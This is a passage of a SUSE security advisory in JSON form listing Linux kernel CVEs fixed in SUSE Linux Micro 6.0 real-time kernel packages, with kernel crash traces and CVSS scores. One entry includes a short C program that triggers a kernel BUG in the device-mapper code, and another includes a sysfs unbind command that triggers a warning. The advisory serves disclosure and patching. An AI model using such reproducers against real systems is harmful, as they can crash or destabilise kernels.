"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dp: Drop aux devices together with DP controller\n\nUsing devres to depopulate the aux bus made sure that upon a probe\ndeferral the EDP panel device would be destroyed and recreated upon next\nattempt.\n\nBut the struct device which the devres is tied to is the DPUs\n(drm_dev-\u003edev), which may be happen after the DP controller is torn\ndown.\n\nIndications of this can be seen in the commonly seen EDID-hexdump full\nof zeros in the log, or the occasional/rare KASAN fault where the\npanel\u0027s attempt to read the EDID information causes a use after free on\nDP resources.\n\nIt\u0027s tempting to move the devres to the DP controller\u0027s struct device,\nbut the resources used by the device(s) on the aux bus are explicitly\ntorn down in the error path. The KASAN-reported use-after-free also\nremains, as the DP aux \"module\" explicitly frees its devres-allocated\nmemory in this code path.\n\nAs such, explicitly depopulate the aux bus in the error path, and in the\ncomponent unbind path, to avoid these issues.\n\nPatchwork: https://patchwork.freedesktop.org/patch/542163/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53851",
"url": "https://www.suse.com/security/cve/CVE-2023-53851"
},
{
"category": "external",
"summary": "SUSE Bug 1254695 for CVE-2023-53851",
"url": "https://bugzilla.suse.com/1254695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53851"
},
{
"cve": "CVE-2023-53852",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53852"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-core: fix memory leak in dhchap_secret_store\n\nFree dhchap_secret in nvme_ctrl_dhchap_secret_store() before we return\nfix following kmemleack:-\n\nunreferenced object 0xffff8886376ea800 (size 64):\n comm \"check\", pid 22048, jiffies 4344316705 (age 92.199s)\n hex dump (first 32 bytes):\n 44 48 48 43 2d 31 3a 30 30 3a 6e 78 72 35 4b 67 DHHC-1:00:nxr5Kg\n 75 58 34 75 6f 41 78 73 4a 61 34 63 2f 68 75 4c uX4uoAxsJa4c/huL\n backtrace:\n [\u003c0000000030ce5d4b\u003e] __kmalloc+0x4b/0x130\n [\u003c000000009be1cdc1\u003e] nvme_ctrl_dhchap_secret_store+0x8f/0x160 [nvme_core]\n [\u003c00000000ac06c96a\u003e] kernfs_fop_write_iter+0x12b/0x1c0\n [\u003c00000000437e7ced\u003e] vfs_write+0x2ba/0x3c0\n [\u003c00000000f9491baf\u003e] ksys_write+0x5f/0xe0\n [\u003c000000001c46513d\u003e] do_syscall_64+0x3b/0x90\n [\u003c00000000ecf348fe\u003e] entry_SYSCALL_64_after_hwframe+0x72/0xdc\nunreferenced object 0xffff8886376eaf00 (size 64):\n comm \"check\", pid 22048, jiffies 4344316736 (age 92.168s)\n hex dump (first 32 bytes):\n 44 48 48 43 2d 31 3a 30 30 3a 6e 78 72 35 4b 67 DHHC-1:00:nxr5Kg\n 75 58 34 75 6f 41 78 73 4a 61 34 63 2f 68 75 4c uX4uoAxsJa4c/huL\n backtrace:\n [\u003c0000000030ce5d4b\u003e] __kmalloc+0x4b/0x130\n [\u003c000000009be1cdc1\u003e] nvme_ctrl_dhchap_secret_store+0x8f/0x160 [nvme_core]\n [\u003c00000000ac06c96a\u003e] kernfs_fop_write_iter+0x12b/0x1c0\n [\u003c00000000437e7ced\u003e] vfs_write+0x2ba/0x3c0\n [\u003c00000000f9491baf\u003e] ksys_write+0x5f/0xe0\n [\u003c000000001c46513d\u003e] do_syscall_64+0x3b/0x90\n [\u003c00000000ecf348fe\u003e] entry_SYSCALL_64_after_hwframe+0x72/0xdc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53852",
"url": "https://www.suse.com/security/cve/CVE-2023-53852"
},
{
"category": "external",
"summary": "SUSE Bug 1254653 for CVE-2023-53852",
"url": "https://bugzilla.suse.com/1254653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53852"
},
{
"cve": "CVE-2023-53855",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53855"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dsa: ocelot: call dsa_tag_8021q_unregister() under rtnl_lock() on driver remove\n\nWhen the tagging protocol in current use is \"ocelot-8021q\" and we unbind\nthe driver, we see this splat:\n\n$ echo \u00270000:00:00.2\u0027 \u003e /sys/bus/pci/drivers/fsl_enetc/unbind\nmscc_felix 0000:00:00.5 swp0: left promiscuous mode\nsja1105 spi2.0: Link is Down\nDSA: tree 1 torn down\nmscc_felix 0000:00:00.5 swp2: left promiscuous mode\nsja1105 spi2.2: Link is Down\nDSA: tree 3 torn down\nfsl_enetc 0000:00:00.2 eno2: left promiscuous mode\nmscc_felix 0000:00:00.5: Link is Down\n------------[ cut here ]------------\nRTNL: assertion failed at net/dsa/tag_8021q.c (409)\nWARNING: CPU: 1 PID: 329 at net/dsa/tag_8021q.c:409 dsa_tag_8021q_unregister+0x12c/0x1a0\nModules linked in:\nCPU: 1 PID: 329 Comm: bash Not tainted 6.5.0-rc3+ #771\npc : dsa_tag_8021q_unregister+0x12c/0x1a0\nlr : dsa_tag_8021q_unregister+0x12c/0x1a0\nCall trace:\n dsa_tag_8021q_unregister+0x12c/0x1a0\n felix_tag_8021q_teardown+0x130/0x150\n felix_teardown+0x3c/0xd8\n dsa_tree_teardown_switches+0xbc/0xe0\n dsa_unregister_switch+0x168/0x260\n felix_pci_remove+0x30/0x60\n pci_device_remove+0x4c/0x100\n device_release_driver_internal+0x188/0x288\n device_links_unbind_consumers+0xfc/0x138\n device_release_driver_internal+0xe0/0x288\n device_driver_detach+0x24/0x38\n unbind_store+0xd8/0x108\n drv_attr_store+0x30/0x50\n---[ end trace 0000000000000000 ]---\n------------[ cut here ]------------\nRTNL: assertion failed at net/8021q/vlan_core.c (376)\nWARNING: CPU: 1 PID: 329 at net/8021q/vlan_core.c:376 vlan_vid_del+0x1b8/0x1f0\nCPU: 1 PID: 329 Comm: bash Tainted: G W 6.5.0-rc3+ #771\npc : vlan_vid_del+0x1b8/0x1f0\nlr : vlan_vid_del+0x1b8/0x1f0\n dsa_tag_8021q_unregister+0x8c/0x1a0\n felix_tag_8021q_teardown+0x130/0x150\n felix_teardown+0x3c/0xd8\n dsa_tree_teardown_switches+0xbc/0xe0\n dsa_unregister_switch+0x168/0x260\n felix_pci_remove+0x30/0x60\n pci_device_remove+0x4c/0x100\n device_release_driver_internal+0x188/0x288\n device_links_unbind_consumers+0xfc/0x138\n device_release_driver_internal+0xe0/0x288\n device_driver_detach+0x24/0x38\n unbind_store+0xd8/0x108\n drv_attr_store+0x30/0x50\nDSA: tree 0 torn down\n\nThis was somewhat not so easy to spot, because \"ocelot-8021q\" is not the\ndefault tagging protocol, and thus, not everyone who tests the unbinding\npath may have switched to it beforehand. The default\nfelix_tag_npi_teardown() does not require rtnl_lock() to be held.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53855",
"url": "https://www.suse.com/security/cve/CVE-2023-53855"
},
{
"category": "external",
"summary": "SUSE Bug 1254688 for CVE-2023-53855",
"url": "https://bugzilla.suse.com/1254688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53855"
},
{
"cve": "CVE-2023-53856",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53856"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nof: overlay: Call of_changeset_init() early\n\nWhen of_overlay_fdt_apply() fails, the changeset may be partially\napplied, and the caller is still expected to call of_overlay_remove() to\nclean up this partial state.\n\nHowever, of_overlay_apply() calls of_resolve_phandles() before\ninit_overlay_changeset(). Hence if the overlay fails to apply due to an\nunresolved symbol, the overlay_changeset.cset.entries list is still\nuninitialized, and cleanup will crash with a NULL-pointer dereference in\noverlay_removal_is_ok().\n\nFix this by moving the call to of_changeset_init() from\ninit_overlay_changeset() to of_overlay_fdt_apply(), where all other\nearly initialization is done.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53856",
"url": "https://www.suse.com/security/cve/CVE-2023-53856"
},
{
"category": "external",
"summary": "SUSE Bug 1254661 for CVE-2023-53856",
"url": "https://bugzilla.suse.com/1254661"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53856"
},
{
"cve": "CVE-2023-53857",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53857"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: bpf_sk_storage: Fix invalid wait context lockdep report\n\n\u0027./test_progs -t test_local_storage\u0027 reported a splat:\n\n[ 27.137569] =============================\n[ 27.138122] [ BUG: Invalid wait context ]\n[ 27.138650] 6.5.0-03980-gd11ae1b16b0a #247 Tainted: G O\n[ 27.139542] -----------------------------\n[ 27.140106] test_progs/1729 is trying to lock:\n[ 27.140713] ffff8883ef047b88 (stock_lock){-.-.}-{3:3}, at: local_lock_acquire+0x9/0x130\n[ 27.141834] other info that might help us debug this:\n[ 27.142437] context-{5:5}\n[ 27.142856] 2 locks held by test_progs/1729:\n[ 27.143352] #0: ffffffff84bcd9c0 (rcu_read_lock){....}-{1:3}, at: rcu_lock_acquire+0x4/0x40\n[ 27.144492] #1: ffff888107deb2c0 (\u0026storage-\u003elock){..-.}-{2:2}, at: bpf_local_storage_update+0x39e/0x8e0\n[ 27.145855] stack backtrace:\n[ 27.146274] CPU: 0 PID: 1729 Comm: test_progs Tainted: G O 6.5.0-03980-gd11ae1b16b0a #247\n[ 27.147550] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014\n[ 27.149127] Call Trace:\n[ 27.149490] \u003cTASK\u003e\n[ 27.149867] dump_stack_lvl+0x130/0x1d0\n[ 27.152609] dump_stack+0x14/0x20\n[ 27.153131] __lock_acquire+0x1657/0x2220\n[ 27.153677] lock_acquire+0x1b8/0x510\n[ 27.157908] local_lock_acquire+0x29/0x130\n[ 27.159048] obj_cgroup_charge+0xf4/0x3c0\n[ 27.160794] slab_pre_alloc_hook+0x28e/0x2b0\n[ 27.161931] __kmem_cache_alloc_node+0x51/0x210\n[ 27.163557] __kmalloc+0xaa/0x210\n[ 27.164593] bpf_map_kzalloc+0xbc/0x170\n[ 27.165147] bpf_selem_alloc+0x130/0x510\n[ 27.166295] bpf_local_storage_update+0x5aa/0x8e0\n[ 27.167042] bpf_fd_sk_storage_update_elem+0xdb/0x1a0\n[ 27.169199] bpf_map_update_value+0x415/0x4f0\n[ 27.169871] map_update_elem+0x413/0x550\n[ 27.170330] __sys_bpf+0x5e9/0x640\n[ 27.174065] __x64_sys_bpf+0x80/0x90\n[ 27.174568] do_syscall_64+0x48/0xa0\n[ 27.175201] entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n[ 27.175932] RIP: 0033:0x7effb40e41ad\n[ 27.176357] Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d8\n[ 27.179028] RSP: 002b:00007ffe64c21fc8 EFLAGS: 00000202 ORIG_RAX: 0000000000000141\n[ 27.180088] RAX: ffffffffffffffda RBX: 00007ffe64c22768 RCX: 00007effb40e41ad\n[ 27.181082] RDX: 0000000000000020 RSI: 00007ffe64c22008 RDI: 0000000000000002\n[ 27.182030] RBP: 00007ffe64c21ff0 R08: 0000000000000000 R09: 00007ffe64c22788\n[ 27.183038] R10: 0000000000000064 R11: 0000000000000202 R12: 0000000000000000\n[ 27.184006] R13: 00007ffe64c22788 R14: 00007effb42a1000 R15: 0000000000000000\n[ 27.184958] \u003c/TASK\u003e\n\nIt complains about acquiring a local_lock while holding a raw_spin_lock.\nIt means it should not allocate memory while holding a raw_spin_lock\nsince it is not safe for RT.\n\nraw_spin_lock is needed because bpf_local_storage supports tracing\ncontext. In particular for task local storage, it is easy to\nget a \"current\" task PTR_TO_BTF_ID in tracing bpf prog.\nHowever, task (and cgroup) local storage has already been moved to\nbpf mem allocator which can be used after raw_spin_lock.\n\nThe splat is for the sk storage. For sk (and inode) storage,\nit has not been moved to bpf mem allocator. Using raw_spin_lock or not,\nkzalloc(GFP_ATOMIC) could theoretically be unsafe in tracing context.\nHowever, the local storage helper requires a verifier accepted\nsk pointer (PTR_TO_BTF_ID), it is hypothetical if that (mean running\na bpf prog in a kzalloc unsafe context and also able to hold a verifier\naccepted sk pointer) could happen.\n\nThis patch avoids kzalloc after raw_spin_lock to silent the splat.\nThere is an existing kzalloc before the raw_spin_lock. At that point,\na kzalloc is very likely required because a lookup has just been done\nbefore. Thus, this patch always does the kzalloc before acq\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53857",
"url": "https://www.suse.com/security/cve/CVE-2023-53857"
},
{
"category": "external",
"summary": "SUSE Bug 1254648 for CVE-2023-53857",
"url": "https://bugzilla.suse.com/1254648"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53857"
},
{
"cve": "CVE-2023-53858",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53858"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: serial: samsung_tty: Fix a memory leak in s3c24xx_serial_getclk() in case of error\n\nIf clk_get_rate() fails, the clk that has just been allocated needs to be\nfreed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53858",
"url": "https://www.suse.com/security/cve/CVE-2023-53858"
},
{
"category": "external",
"summary": "SUSE Bug 1254704 for CVE-2023-53858",
"url": "https://bugzilla.suse.com/1254704"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53858"
},
{
"cve": "CVE-2023-53860",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53860"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: don\u0027t attempt to queue IO under RCU protection\n\ndm looks up the table for IO based on the request type, with an\nassumption that if the request is marked REQ_NOWAIT, it\u0027s fine to\nattempt to submit that IO while under RCU read lock protection. This\nis not OK, as REQ_NOWAIT just means that we should not be sleeping\nwaiting on other IO, it does not mean that we can\u0027t potentially\nschedule.\n\nA simple test case demonstrates this quite nicely:\n\nint main(int argc, char *argv[])\n{\n struct iovec iov;\n int fd;\n\n fd = open(\"/dev/dm-0\", O_RDONLY | O_DIRECT);\n posix_memalign(\u0026iov.iov_base, 4096, 4096);\n iov.iov_len = 4096;\n preadv2(fd, \u0026iov, 1, 0, RWF_NOWAIT);\n return 0;\n}\n\nwhich will instantly spew:\n\nBUG: sleeping function called from invalid context at include/linux/sched/mm.h:306\nin_atomic(): 0, irqs_disabled(): 0, non_block: 0, pid: 5580, name: dm-nowait\npreempt_count: 0, expected: 0\nRCU nest depth: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 7 PID: 5580 Comm: dm-nowait Not tainted 6.6.0-rc1-g39956d2dcd81 #132\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x11d/0x1b0\n __might_resched+0x3c3/0x5e0\n ? preempt_count_sub+0x150/0x150\n mempool_alloc+0x1e2/0x390\n ? mempool_resize+0x7d0/0x7d0\n ? lock_sync+0x190/0x190\n ? lock_release+0x4b7/0x670\n ? internal_get_user_pages_fast+0x868/0x2d40\n bio_alloc_bioset+0x417/0x8c0\n ? bvec_alloc+0x200/0x200\n ? internal_get_user_pages_fast+0xb8c/0x2d40\n bio_alloc_clone+0x53/0x100\n dm_submit_bio+0x27f/0x1a20\n ? lock_release+0x4b7/0x670\n ? blk_try_enter_queue+0x1a0/0x4d0\n ? dm_dax_direct_access+0x260/0x260\n ? rcu_is_watching+0x12/0xb0\n ? blk_try_enter_queue+0x1cc/0x4d0\n __submit_bio+0x239/0x310\n ? __bio_queue_enter+0x700/0x700\n ? kvm_clock_get_cycles+0x40/0x60\n ? ktime_get+0x285/0x470\n submit_bio_noacct_nocheck+0x4d9/0xb80\n ? should_fail_request+0x80/0x80\n ? preempt_count_sub+0x150/0x150\n ? lock_release+0x4b7/0x670\n ? __bio_add_page+0x143/0x2d0\n ? iov_iter_revert+0x27/0x360\n submit_bio_noacct+0x53e/0x1b30\n submit_bio_wait+0x10a/0x230\n ? submit_bio_wait_endio+0x40/0x40\n __blkdev_direct_IO_simple+0x4f8/0x780\n ? blkdev_bio_end_io+0x4c0/0x4c0\n ? stack_trace_save+0x90/0xc0\n ? __bio_clone+0x3c0/0x3c0\n ? lock_release+0x4b7/0x670\n ? lock_sync+0x190/0x190\n ? atime_needs_update+0x3bf/0x7e0\n ? timestamp_truncate+0x21b/0x2d0\n ? inode_owner_or_capable+0x240/0x240\n blkdev_direct_IO.part.0+0x84a/0x1810\n ? rcu_is_watching+0x12/0xb0\n ? lock_release+0x4b7/0x670\n ? blkdev_read_iter+0x40d/0x530\n ? reacquire_held_locks+0x4e0/0x4e0\n ? __blkdev_direct_IO_simple+0x780/0x780\n ? rcu_is_watching+0x12/0xb0\n ? __mark_inode_dirty+0x297/0xd50\n ? preempt_count_add+0x72/0x140\n blkdev_read_iter+0x2a4/0x530\n do_iter_readv_writev+0x2f2/0x3c0\n ? generic_copy_file_range+0x1d0/0x1d0\n ? fsnotify_perm.part.0+0x25d/0x630\n ? security_file_permission+0xd8/0x100\n do_iter_read+0x31b/0x880\n ? import_iovec+0x10b/0x140\n vfs_readv+0x12d/0x1a0\n ? vfs_iter_read+0xb0/0xb0\n ? rcu_is_watching+0x12/0xb0\n ? rcu_is_watching+0x12/0xb0\n ? lock_release+0x4b7/0x670\n do_preadv+0x1b3/0x260\n ? do_readv+0x370/0x370\n __x64_sys_preadv2+0xef/0x150\n do_syscall_64+0x39/0xb0\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\nRIP: 0033:0x7f5af41ad806\nCode: 41 54 41 89 fc 55 44 89 c5 53 48 89 cb 48 83 ec 18 80 3d e4 dd 0d 00 00 74 7a 45 89 c1 49 89 ca 45 31 c0 b8 47 01 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 0f 87 be 00 00 00 48 85 c0 79 4a 48 8b 0d da 55\nRSP: 002b:00007ffd3145c7f0 EFLAGS: 00000246 ORIG_RAX: 0000000000000147\nRAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5af41ad806\nRDX: 0000000000000001 RSI: 00007ffd3145c850 RDI: 0000000000000003\nRBP: 0000000000000008 R08: 0000000000000000 R09: 0000000000000008\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000003\nR13: 00007ffd3145c850 R14: 000055f5f0431dd8 R15: 0000000000000001\n \u003c/TASK\u003e\n\nwhere in fact it is\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53860",
"url": "https://www.suse.com/security/cve/CVE-2023-53860"
},
{
"category": "external",
"summary": "SUSE Bug 1254626 for CVE-2023-53860",
"url": "https://bugzilla.suse.com/1254626"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
